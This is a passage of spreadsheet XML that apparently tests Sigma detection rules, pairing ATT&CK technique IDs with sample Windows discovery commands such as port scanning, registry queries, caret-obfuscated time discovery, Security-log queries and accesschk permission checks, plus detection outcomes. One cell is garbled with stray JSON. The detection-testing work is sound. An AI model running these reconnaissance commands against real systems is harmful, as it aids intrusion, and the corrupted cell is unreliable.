      </c>
    </row>
    <row r="1987" ht="15.75" customHeight="1" s="42">
      <c r="A1987" s="44" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B1987" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_advanced_port_scanner</t>
        </is>
      </c>
      <c r="C1987" s="44" t="inlineStr">
        <is>
          <t>PUA - Advanced Port Scanner Execution</t>
        </is>
      </c>
      <c r="D1987" s="44" t="inlineStr">
        <is>
          <t>54773c5f-f1cc-4703-9126-2f797d96a69d</t>
        </is>
      </c>
      <c r="E1987" s="44" t="inlineStr">
        <is>
          <t>advanced_port_scanner.exe /portable</t>
        </is>
      </c>
      <c r="F1987" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1987" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1987" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1987" s="44" t="n"/>
      <c r="J1987" s="44" t="n"/>
      <c r="K1987" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1988" ht="15.75" customHeight="1" s="42">
      <c r="A1988" s="44" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B1988" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_advanced_port_scanner</t>
        </is>
      </c>
      <c r="C1988" s="44" t="inlineStr">
        <is>
          <t>PUA - Advanced Port Scanner Execution</t>
        </is>
      </c>
      <c r="D1988" s="44" t="inlineStr">
        <is>
          <t>54773c5f-f1cc-4703-9126-2f797d96a69d</t>
        </is>
      </c>
      <c r="E1988" s="44" t="inlineStr">
        <is>
          <t>advanced_port_scanner.exe /lng /portable</t>
        </is>
      </c>
      <c r="F1988" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1988" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1988" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1988" s="44" t="n"/>
      <c r="J1988" s="44" t="n"/>
      <c r="K1988" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1989" ht="15.75" customHeight="1" s="42">
      <c r="A1989" s="44" t="inlineStr">
        <is>
          <t>t1518</t>
        </is>
      </c>
      <c r="B1989" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_software_discovery</t>
        </is>
      </c>
      <c r="C1989" s="44" t="inlineStr">
        <is>
          <t>Detected Windows Software Discovery</t>
        </is>
      </c>
      <c r="D1989" s="44" t="inlineStr">
        <is>
          <t>e13f668e-7f95-443d-98d2-1816a7648a7b</t>
        </is>
      </c>
      <c r="E1989" s="44" t="inlineStr">
        <is>
          <t>reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer" /v svcVersion</t>
        </is>
      </c>
      <c r="F1989" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1989" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1989" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1989" s="44" t="inlineStr">
        <is>
          <t>Detected Windows Software Discovery (e13f668e-7f95-443d-98d2-1816a7648a7b)</t>
        </is>
      </c>
      <c r="J1989" s="44" t="n"/>
      <c r="K1989" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1990" ht="15.75" customHeight="1" s="42">
      <c r="A1990" s="44" t="inlineStr">
        <is>
          <t>t1518</t>
        </is>
      </c>
      <c r="B1990" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_software_discovery</t>
        </is>
      </c>
      <c r="C1990" s="44" t="inlineStr">
        <is>
          <t>Detected Windows Software Discovery</t>
        </is>
      </c>
      <c r="D1990" s="44" t="inlineStr">
        <is>
          <t>e13f668e-7f95-443d-98d2-1816a7648a7b</t>
        </is>
      </c>
      <c r="E1990" s="44" t="inlineStr">
        <is>
          <t>reg.exe query "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer" /v svcVersion</t>
        </is>
      </c>
      <c r="F1990" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1990" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1990" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1990" s="44" t="inlineStr">
        <is>
          <t>Detected Windows Software Discovery (e13f668e-7f95-443d-98d2-1816a7648a7b)</t>
        </is>
      </c>
      <c r="J1990" s="44" t="n"/>
      <c r="K1990" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1991" ht="15.75" customHeight="1" s="42">
      <c r="A1991" s="44" t="inlineStr">
        <is>
          <t>t1518</t>
        </is>
      </c>
      <c r="B1991" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_software_discovery</t>
        </is>
      </c>
      <c r="C1991" s="44" t="inlineStr">
        <is>
          <t>Detected Windows Software Discovery</t>
        </is>
      </c>
      <c r="D1991" s="44" t="inlineStr">
        <is>
          <t>e13f668e-7f95-443d-98d2-1816a7648a7b</t>
        </is>
      </c>
      <c r="E1991" s="44" t="inlineStr">
        <is>
          <t>reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer" /v "svcVersion"</t>
        </is>
      </c>
      <c r="F1991" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1991" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1991" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1991" s="44" t="inlineStr">
        <is>
          <t>Detected Windows Software Discovery (e13f668e-7f95-443d-98d2-1816a7648a7b)</t>
        </is>
      </c>
      <c r="J1991" s="44" t="n"/>
      <c r="K1991" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1992" ht="15.75" customHeight="1" s="42">
      <c r="A1992" s="44" t="inlineStr">
        <is>
          <t>t1124</t>
        </is>
      </c>
      <c r="B1992" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_time_discovery</t>
        </is>
      </c>
      <c r="C1992" s="44" t="inlineStr">
        <is>
          <t>Discovery of a System Time</t>
        </is>
      </c>
      <c r="D1992" s="44" t="inlineStr">
        <is>
          <t>b243b280-65fe-48df-ba07-6ddea7646427</t>
        </is>
      </c>
      <c r="E1992" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "net1 ti^me \localhost"</t>
        </is>
      </c>
      <c r="F1992" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1992" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1992" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1992" s="44" t="inlineStr">
        <is>
          <t>Discovery of a System Time (b243b280-65fe-48df-ba07-6ddea7646427)</t>
        </is>
      </c>
      <c r="J1992" s="44" t="n"/>
      <c r="K1992" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1993" ht="15.75" customHeight="1" s="42">
      <c r="A1993" s="44" t="inlineStr">
        <is>
          <t>t1124</t>
        </is>
      </c>
      <c r="B1993" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_time_discovery</t>
        </is>
      </c>
      <c r="C1993" s="44" t="inlineStr">
        <is>
          <t>Discovery of a System Time</t>
        </is>
      </c>
      <c r="D1993" s="44" t="inlineStr">
        <is>
          <t>b243b280-65fe-48df-ba07-6ddea7646427</t>
        </is>
      </c>
      <c r="E1993" s="44" t="inlineStr">
        <is>
          <t>net "time" \localhost"
},
{
"output": "cmd.exe /c "w32tm /t^z"</t>
        </is>
      </c>
      <c r="F1993" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1993" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1993" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1993" s="44" t="inlineStr">
        <is>
          <t>Discovery of a System Time (b243b280-65fe-48df-ba07-6ddea7646427); Discovery of a System Time (b243b280-65fe-48df-ba07-6ddea7646427)</t>
        </is>
      </c>
      <c r="J1993" s="44" t="n"/>
      <c r="K1993" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1994" ht="15.75" customHeight="1" s="42">
      <c r="A1994" s="44" t="inlineStr">
        <is>
          <t>t1124</t>
        </is>
      </c>
      <c r="B1994" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_w32tm</t>
        </is>
      </c>
      <c r="C1994" s="44" t="inlineStr">
        <is>
          <t>Use of W32tm as Timer</t>
        </is>
      </c>
      <c r="D1994" s="44" t="inlineStr">
        <is>
          <t>6da2c9f5-7c53-401b-aacb-92c040ce1215</t>
        </is>
      </c>
      <c r="E1994" s="44" t="inlineStr">
        <is>
          <t>W32tm "/stripchart" /computer:localhost /period:5 /dataonly /samples:2</t>
        </is>
      </c>
      <c r="F1994" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1994" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1994" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1994" s="44" t="inlineStr">
        <is>
          <t>Use of W32tm as Timer (6da2c9f5-7c53-401b-aacb-92c040ce1215)</t>
        </is>
      </c>
      <c r="J1994" s="44" t="n"/>
      <c r="K1994" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1995" ht="15.75" customHeight="1" s="42">
      <c r="A1995" s="44" t="inlineStr">
        <is>
          <t>t1124</t>
        </is>
      </c>
      <c r="B1995" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_w32tm</t>
        </is>
      </c>
      <c r="C1995" s="44" t="inlineStr">
        <is>
          <t>Use of W32tm as Timer</t>
        </is>
      </c>
      <c r="D1995" s="44" t="inlineStr">
        <is>
          <t>6da2c9f5-7c53-401b-aacb-92c040ce1215</t>
        </is>
      </c>
      <c r="E1995" s="44" t="inlineStr">
        <is>
          <t>W32tm /stripchart /computer:127.0.0.1 /period:5 /dataonly /samples:2</t>
        </is>
      </c>
      <c r="F1995" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1995" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1995" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1995" s="44" t="inlineStr">
        <is>
          <t>Use of W32tm as Timer (6da2c9f5-7c53-401b-aacb-92c040ce1215)</t>
        </is>
      </c>
      <c r="J1995" s="44" t="n"/>
      <c r="K1995" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1996" ht="15.75" customHeight="1" s="42">
      <c r="A1996" s="44" t="inlineStr">
        <is>
          <t>t1124</t>
        </is>
      </c>
      <c r="B1996" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_w32tm</t>
        </is>
      </c>
      <c r="C1996" s="44" t="inlineStr">
        <is>
          <t>Use of W32tm as Timer</t>
        </is>
      </c>
      <c r="D1996" s="44" t="inlineStr">
        <is>
          <t>6da2c9f5-7c53-401b-aacb-92c040ce1215</t>
        </is>
      </c>
      <c r="E1996" s="44" t="inlineStr">
        <is>
          <t>W32tm /samples:2 /dataonly /period:5 /computer:localhost /stripchart</t>
        </is>
      </c>
      <c r="F1996" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1996" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1996" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1996" s="44" t="inlineStr">
        <is>
          <t>Use of W32tm as Timer (6da2c9f5-7c53-401b-aacb-92c040ce1215)</t>
        </is>
      </c>
      <c r="J1996" s="44" t="n"/>
      <c r="K1996" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1997" ht="15.75" customHeight="1" s="42">
      <c r="A1997" s="44" t="inlineStr">
        <is>
          <t>t1124</t>
        </is>
      </c>
      <c r="B1997" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_w32tm</t>
        </is>
      </c>
      <c r="C1997" s="44" t="inlineStr">
        <is>
          <t>Use of W32tm as Timer</t>
        </is>
      </c>
      <c r="D1997" s="44" t="inlineStr">
        <is>
          <t>6da2c9f5-7c53-401b-aacb-92c040ce1215</t>
        </is>
      </c>
      <c r="E1997" s="44" t="inlineStr">
        <is>
          <t>W32tm ^/^s^t^r^i^p^c^h^a^r^t /computer:localhost /period:5 /dataonly /samples:2</t>
        </is>
      </c>
      <c r="F1997" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1997" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1997" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1997" s="44" t="inlineStr">
        <is>
          <t>Use of W32tm as Timer (6da2c9f5-7c53-401b-aacb-92c040ce1215)</t>
        </is>
      </c>
      <c r="J1997" s="44" t="n"/>
      <c r="K1997" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1998" ht="15.75" customHeight="1" s="42">
      <c r="A1998" s="44" t="inlineStr">
        <is>
          <t>t1552</t>
        </is>
      </c>
      <c r="B1998" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_eventlog_content_recon</t>
        </is>
      </c>
      <c r="C1998" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious EventLog Recon Activity Using Log Query Utilities</t>
        </is>
      </c>
      <c r="D1998" s="44" t="inlineStr">
        <is>
          <t>beaa66d6-aa1b-4e3c-80f5-e0145369bfaf</t>
        </is>
      </c>
      <c r="E1998" s="44" t="inlineStr">
        <is>
          <t>wevtutil.exe qe "Security" "/q:*[System[(EventID=4624)]]"</t>
        </is>
      </c>
      <c r="F1998" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1998" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1998" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1998" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious EventLog Recon Activity Using Log Query Utilities (beaa66d6-aa1b-4e3c-80f5-e0145369bfaf)</t>
        </is>
      </c>
      <c r="J1998" s="44" t="n"/>
      <c r="K1998" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1999" ht="15.75" customHeight="1" s="42">
      <c r="A1999" s="44" t="inlineStr">
        <is>
          <t>t1552</t>
        </is>
      </c>
      <c r="B1999" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_eventlog_content_recon</t>
        </is>
      </c>
      <c r="C1999" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious EventLog Recon Activity Using Log Query Utilities</t>
        </is>
      </c>
      <c r="D1999" s="44" t="inlineStr">
        <is>
          <t>beaa66d6-aa1b-4e3c-80f5-e0145369bfaf</t>
        </is>
      </c>
      <c r="E1999" s="44" t="inlineStr">
        <is>
          <t>wevtutil.exe qe Security /q:"*[System/EventID=4624]"</t>
        </is>
      </c>
      <c r="F1999" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1999" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1999" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1999" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious EventLog Recon Activity Using Log Query Utilities (beaa66d6-aa1b-4e3c-80f5-e0145369bfaf)</t>
        </is>
      </c>
      <c r="J1999" s="44" t="n"/>
      <c r="K1999" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2000" ht="15.75" customHeight="1" s="42">
      <c r="A2000" s="44" t="inlineStr">
        <is>
          <t>t1069.001</t>
        </is>
      </c>
      <c r="B2000" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_accesschk_check_permissions</t>
        </is>
      </c>
      <c r="C2000" s="44" t="inlineStr">
        <is>
          <t>Permission Check Via Accesschk.EXE</t>
        </is>
      </c>
      <c r="D2000" s="44" t="inlineStr">
        <is>
          <t>c625d754-6a3d-4f65-9c9a-536aea960d37</t>
        </is>
      </c>
      <c r="E2000" s="44" t="inlineStr">
        <is>
          <t>accesschk.exe -u -w -c -q -v administrators</t>
        </is>
      </c>
      <c r="F2000" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G2000" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2000" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2000" s="44" t="n"/>
      <c r="J2000" s="44" t="n"/>
      <c r="K2000" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2001" ht="15.75" customHeight="1" s="42">
      <c r="A2001" s="44" t="inlineStr">
        <is>
          <t>t1069.001</t>
        </is>
      </c>
      <c r="B2001" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_accesschk_check_permissions</t>
        </is>
      </c>
      <c r="C2001" s="44" t="inlineStr">
        <is>
          <t>Permission Check Via Accesschk.EXE</t>
        </is>
      </c>
      <c r="D2001" s="44" t="inlineStr">
        <is>
          <t>c625d754-6a3d-4f65-9c9a-536aea960d37</t>
        </is>
      </c>
      <c r="E2001" s="44" t="inlineStr">
        <is>
          <t>accesschk.exe -uwdqs administrators</t>
        </is>
      </c>
      <c r="F2001" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G2001" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2001" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2001" s="44" t="n"/>
      <c r="J2001" s="44" t="n"/>
      <c r="K2001" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2002" ht="15.75" customHeight="1" s="42"/>
    <row r="2003" ht="15.75" customHeight="1" s="42"/>
    <row r="2004" ht="15.75" customHeight="1" s="42"/>
    <row r="2005" ht="15.75" customHeight="1" s="42"/>
    <row r="2006" ht="15.75" customHeight="1" s="42"/>
    <row r="2007" ht="15.75" customHeight="1" s="42"/>
    <row r="2008" ht="15.75" customHeight="1" s="42"/>
    <row r="2009" ht="15.75" customHeight="1" s="42"/>
    <row r="2010" ht="15.75" customHeight="1" s="42"/>
    <row r="2011" ht="15.75" customHeight="1" s="42"/>
    <row r="2012" ht="15.75" customHeight="1" s="42"/>
    <row r="2013" ht="15.75" customHeight="1" s="42"/>
    <row r="2014" ht="15.75" customHeight="1" s="42"/>
    <row r="2015" ht="15.75" customHeight="1" s="42"/>
    <row r="2016" ht="15.75" customHeight="1" s="42"/>
    <row r="2017" ht="15.75" customHeight="1" s="42"/>
    <row r="2018" ht="15.75" customHeight="1" s="42"/>
    <row r="2019" ht="15.75" customHeight="1" s="42"/>
    <row r="2020" ht="15.75" customHeight="1" s="42"/>
    <row r="2021" ht="15.75" customHeight="1" s="42"/>
    <row r="2022" ht="15.75" customHeight="1" s="42"/>
    <row r="2023" ht="15.75" customHeight="1" s="42"/>
    <row r="2024" ht="15.75" customHeight="1" s="42"/>
    <row r="2025" ht="15.75" customHeight="1" s="42"/>
    <row r="2026" ht="15.75" customHeight="1" s="42"/>
    <row r="2027" ht="15.75" customHeight="1" s="42"/>
    <row r="2028" ht="15.75" customHeight="1" s="42"/>
    <row r="2029" ht="15.75" customHeight="1" s="42"/>
    <row r="2030" ht="15.75" customHeight="1" s="42"/>
    <row r="2031" ht="15.75" customHeight="1" s="42"/>
    <row r="2032" ht="15.75" customHeight="1" s="42"/>
    <row r="2033" ht="15.75" customHeight="1" s="42"/>
    <row r="2034" ht="15.75" customHeight="1" s="42"/>
    <row r="2035" ht="15.75" customHeight="1" s="42"/>
    <row r="2036" ht="15.75" customHeight="1" s="42"/>
    <row r="2037" ht="15.75" customHeight="1" s="42"/>
    <row r="2038" ht="15.75" customHeight="1" s="42"/>
    <row r="2039" ht="15.75" customHeight="1" s="42"/>
    <row r="2040" ht="15.75" customHeight="1" s="42"/>
    <row r="2041" ht="15.75" customHeight="1" s="42"/>
    <row r="2042" ht="15.75" customHeight="1" s="42"/>
    <row r="2043" ht="15.75" customHeight="1" s="42"/>
    <row r="2044" ht="15.75" customHeight="1" s="42"/>
    <row r="2045" ht="15.75" customHeight="1" s="42"/>
    <row r="2046" ht="15.75" customHeight="1" s="42"/>
    <row r="2047" ht="15.75" customHeight="1" s="42"/>
    <row r="2048" ht="15.75" customHeight="1" s="42"/>
    <row r="2049" ht="15.75" customHeight="1" s="42"/>
    <row r="2050" ht="15.75" customHeight="1" s="42"/>
    <row r="2051" ht="15.75" customHeight="1" s="42"/>
    <row r="2052" ht="15.75" customHeight="1" s="42"/>
    <row r="2053" ht="15.75" customHeight="1" s="42"/>
    <row r="2054" ht="15.75" customHeight="1" s="42"/>
    <row r="2055" ht="15.75" customHeight="1" s="42"/>
    <row r="2056" ht="15.75" customHeight="1" s="42"/>
    <row r="2057" ht="15.75" customHeight="1" s="42"/>
    <row r="2058" ht="15.75" customHeight="1" s="42"/>
    <row r="2059" ht="15.75" customHeight="1" s="42"/>
    <row r="2060" ht="15.75" customHeight="1" s="42"/>
    <row r="2061" ht="15.75" customHeight="1" s="42"/>
    <row r="2062" ht="15.75" customHeight="1" s="42"/>
    <row r="2063" ht="15.75" customHeight="1" s="42"/>
    <row r="2064" ht="15.75" customHeight="1" s="42"/>
    <row r="2065" ht="15.75" customHeight="1" s="42"/>
    <row r="2066" ht="15.75" customHeight="1" s="42"/>
    <row r="2067" ht="15.75" customHeight="1" s="42"/>
    <row r="2068" ht="15.75" customHeight="1" s="42"/>
    <row r="2069" ht="15.75" customHeight="1" s="42"/>
    <row r="2070" ht="15.75" customHeight="1" s="42"/>
    <row r="2071" ht="15.75" customHeight="1" s="42"/>
    <row r="2072" ht="15.75" customHeight="1" s="42"/>
    <row r="2073" ht="15.75" customHeight="1" s="42"/>
    <row r="2074" ht="15.75" customHeight="1" s="42"/>
    <row r="2075" ht="15.75" customHeight="1" s="42"/>
    <row r="2076" ht="15.75" customHeight="1" s="42"/>
    <row r="2077" ht="15.75" customHeight="1" s="42"/>
    <row r="2078" ht="15.75" customHeight="1" s="42"/>
    <row r="2079" ht="15.75" customHeight="1" s="42"/>
    <row r="2080" ht="15.75" customHeight="1" s="42"/>
    <row r="2081" ht="15.75" customHeight="1" s="42"/>
    <row r="2082" ht="15.75" customHeight="1" s="42"/>
    <row r="2083" ht="15.75" customHeight="1" s="42"/>
    <row r="2084" ht="15.75" customHeight="1" s="42"/>
    <row r="2085" ht="15.75" customHeight="1" s="42"/>
    <row r="2086" ht="15.75" customHeight="1" s="42"/>
    <row r="2087" ht="15.75" customHeight="1" s="42"/>
    <row r="2088" ht="15.75" customHeight="1" s="42"/>
    <row r="2089" ht="15.75" customHeight="1" s="42"/>
    <row r="2090" ht="15.75" customHeight="1" s="42"/>
    <row r="2091" ht="15.75" customHeight="1" s="42"/>
    <row r="2092" ht="15.75" customHeight="1" s="42"/>
    <row r="2093" ht="15.75" customHeight="1" s="42"/>
    <row r="2094" ht="15.75" customHeight="1" s="42"/>
    <row r="2095" ht="15.75" customHeight="1" s="42"/>
    <row r="2096" ht="15.75" customHeight="1" s="42"/>
    <row r="2097" ht="15.75" customHeight="1" s="42"/>
    <row r="2098" ht="15.75" customHeight="1" s="42"/>
    <row r="2099" ht="15.75" customHeight="1" s="42"/>
    <row r="2100" ht="15.75" customHeight="1" s="42"/>
    <row r="2101" ht="15.75" customHeight="1" s="42"/>
    <row r="2102" ht="15.75" customHeight="1" s="42"/>
    <row r="2103" ht="15.75" customHeight="1" s="42"/>
    <row r="2104" ht="15.75" customHeight="1" s="42"/>
    <row r="2105" ht="15.75" customHeight="1" s="42"/>
    <row r="2106" ht="15.75" customHeight="1" s="42"/>
    <row r="2107" ht="15.75" customHeight="1" s="42"/>
    <row r="2108" ht="15.75" customHeight="1" s="42"/>
    <row r="2109" ht="15.75" customHeight="1" s="42"/>
    <row r="2110" ht="15.75" customHeight="1" s="42"/>
    <row r="2111" ht="15.75" customHeight="1" s="42"/>
    <row r="2112" ht="15.75" customHeight="1" s="42"/>
    <row r="2113" ht="15.75" customHeight="1" s="42"/>
    <row r="2114" ht="15.75" customHeight="1" s="42"/>
    <row r="2115" ht="15.75" customHeight="1" s="42"/>
    <row r="2116" ht="15.75" customHeight="1" s="42"/>
    <row r="2117" ht="15.75" customHeight="1" s="42"/>
    <row r="2118" ht="15.75" customHeight="1" s="42"/>
    <row r="2119" ht="15.75" customHeight="1" s="42"/>
    <row r="2120" ht="15.75" customHeight="1" s="42"/>
    <row r="2121" ht="15.75" customHeight="1" s="42"/>
    <row r="2122" ht="15.75" customHeight="1" s="42"/>
    <row r="2123" ht="15.75" customHeight="1" s="42"/>
    <row r="2124" ht="15.75" customHeight="1" s="42"/>
    <row r="2125" ht="15.75" customHeight="1" s="42"/>
    <row r="2126" ht="15.75" customHeight="1" s="42"/>
    <row r="2127" ht="15.75" customHeight="1" s="42"/>
    <row r="2128" ht="15.75" customHeight="1" s="42"/>
    <row r="2129" ht="15.75" customHeight="1" s="42"/>
    <row r="2130" ht="15.75" customHeight="1" s="42"/>
    <row r="2131" ht="15.75" customHeight="1" s="42"/>
    <row r="2132" ht="15.75" customHeight="1" s="42"/>
    <row r="2133" ht="15.75" customHeight="1" s="42"/>
    <row r="2134" ht="15.75" customHeight="1" s="42"/>
    <row r="2135" ht="15.75" customHeight="1" s="42"/>
    <row r="2136" ht="15.75" customHeight="1" s="42"/>
    <row r="2137" ht="15.75" customHeight="1" s="42"/>
    <row r="2138" ht="15.75" customHeight="1" s="42"/>
    <row r="2139" ht="15.75" customHeight="1" s="42"/>
    <row r="2140" ht="15.75" customHeight="1" s="42"/>
    <row r="2141" ht="15.75" customHeight="1" s="42"/>
    <row r="2142" ht="15.75" customHeight="1" s="42"/>
    <row r="2143" ht="15.75" customHeight="1" s="42"/>
    <row r="2144" ht="15.75" customHeight="1" s="42"/>
    <row r="2145" ht="15.75" customHeight="1" s="42"/>
    <row r="2146" ht="15.75" customHeight="1" s="42"/>
    <row r="2147" ht="15.75" customHeight="1" s="42"/>
    <row r="2148" ht="15.75" customHeight="1" s="42"/>
    <row r="2149" ht="15.75" customHeight="1" s="42"/>
    <row r="2150" ht="15.75" customHeight="1" s="42"/>
    <row r="2151" ht="15.75" customHeight="1" s="42"/>
    <row r="2152" ht="15.75" customHeight="1" s="42"/>
    <row r="2153" ht="15.75" customHeight="1" s="42"/>
    <row r="2154" ht="15.75" customHeight="1" s="42"/>
    <row r="2155" ht="15.75" customHeight="1" s="42"/>
    <row r="2156" ht="15.75" customHeight="1" s="42"/>
    <row r="2157" ht="15.75" customHeight="1" s="42"/>
    <row r="2158" ht="15.75" customHeight="1" s="42"/>
    <row r="2159" ht="15.75" customHeight="1" s="42"/>
    <row r="2160" ht="15.75" customHeight="1" s="42"/>
    <row r="2161" ht="15.75" customHeight="1" s="42"/>
    <row r="2162" ht="15.75" customHeight="1" s="42"/>
    <row r="2163" ht="15.75" customHeight="1" s="42"/>
    <row r="2164" ht="15.75" customHeight="1" s="42"/>
    <row r="2165" ht="15.75" customHeight="1" s="42"/>
    <row r="2166" ht="15.75" customHeight="1" s="42"/>
    <row r="2167" ht="15.75" customHeight="1" s="42"/>
    <row r="2168" ht="15.75" customHeight="1" s="42"/>
    <row r="2169" ht="15.75" customHeight="1" s="42"/>
    <row r="2170" ht="15.75" customHeight="1" s="42"/>
    <row r="2171" ht="15.75" customHeight="1" s="42"/>
    <row r="2172" ht="15.75" customHeight="1" s="42"/>
    <row r="2173" ht="15.75" customHeight="1" s="42"/>
    <row r="2174" ht="15.75" customHeight="1" s="42"/>
    <row r="2175" ht="15.75" customHeight="1" s="42"/>
    <row r="2176" ht="15.75" customHeight="1" s="42"/>
    <row r="2177" ht="15.75" customHeight="1" s="42"/>
    <row r="2178" ht="15.75" customHeight="1" s="42"/>
    <row r="2179" ht="15.75" customHeight="1" s="42"/>
    <row r="2180" ht="15.75" customHeight="1" s="42"/>
    <row r="2181" ht="15.75" customHeight="1" s="42"/>
    <row r="2182" ht="15.75" customHeight="1" s="42"/>
    <row r="2183" ht="15.75" customHeight="1" s="42"/>
    <row r="2184" ht="15.75" customHeight="1" s="42"/>
    <row r="2185" ht="15.75" customHeight="1" s="42"/>
    <row r="2186" ht="15.75" customHeight="1" s="42"/>
    <row r="2187" ht="15.75" customHeight="1" s="42"/>
    <row r="2188" ht="15.75" customHeight="1" s="42"/>
    <row r="2189" ht="15.75" customHeight="1" s="42"/>
    <row r="2190" ht="15.75" customHeight="1" s="42"/>
    <row r="2191" ht="15.75" customHeight="1" s="42"/>
    <row r="2192" ht="15.75" customHeight="1" s="42"/>
    <row r="2193" ht="15.75" customHeight="1" s="42"/>
    <row r="2194" ht="15.75" customHeight="1" s="42"/>
    <row r="2195" ht="15.75" customHeight="1" s="42"/>
    <row r="2196" ht="15.75" customHeight="1" s="42"/>
    <row r="2197" ht="15.75" customHeight="1" s="42"/>
    <row r="2198" ht="15.75" customHeight="1" s="42"/>
    <row r="2199" ht="15.75" customHeight="1" s="42"/>
    <row r="2200" ht="15.75" customHeight="1" s="42"/>
    <row r="2201" ht="15.75" customHeight="1" s="42"/>
    <row r="2202" ht="15.75" customHeight="1" s="42"/>
    <row r="2203" ht="15.75" customHeight="1" s="42"/>
    <row r="2204" ht="15.75" customHeight="1" s="42"/>
    <row r="2205" ht="15.75" customHeight="1" s="42"/>
    <row r="2206" ht="15.75" customHeight="1" s="42"/>
    <row r="2207" ht="15.75" customHeight="1" s="42"/>
    <row r="2208" ht="15.75" customHeight="1" s="42"/>
    <row r="2209" ht="15.75" customHeight="1" s="42"/>
    <row r="2210" ht="15.75" customHeight="1" s="42"/>
    <row r="2211" ht="15.75" customHeight="1" s="42"/>
    <row r="2212" ht="15.75" customHeight="1" s="42"/>
    <row r="2213" ht="15.75" customHeight="1" s="42"/>
    <row r="2214" ht="15.75" customHeight="1" s="42"/>
    <row r="2215" ht="15.75" customHeight="1" s="42"/>
    <row r="2216" ht="15.75" customHeight="1" s="42"/>
    <row r="2217" ht="15.75" customHeight="1" s="42"/>
    <row r="2218" ht="15.75" customHeight="1" s="42"/>
    <row r="2219" ht="15.75" customHeight="1" s="42"/>
    <row r="2220" ht="15.75" customHeight="1" s="42"/>
    <row r="2221" ht="15.75" customHeight="1" s="42"/>
    <row r="2222" ht="15.75" customHeight="1" s="42"/>
    <row r="2223" ht="15.75" customHeight="1" s="42"/>
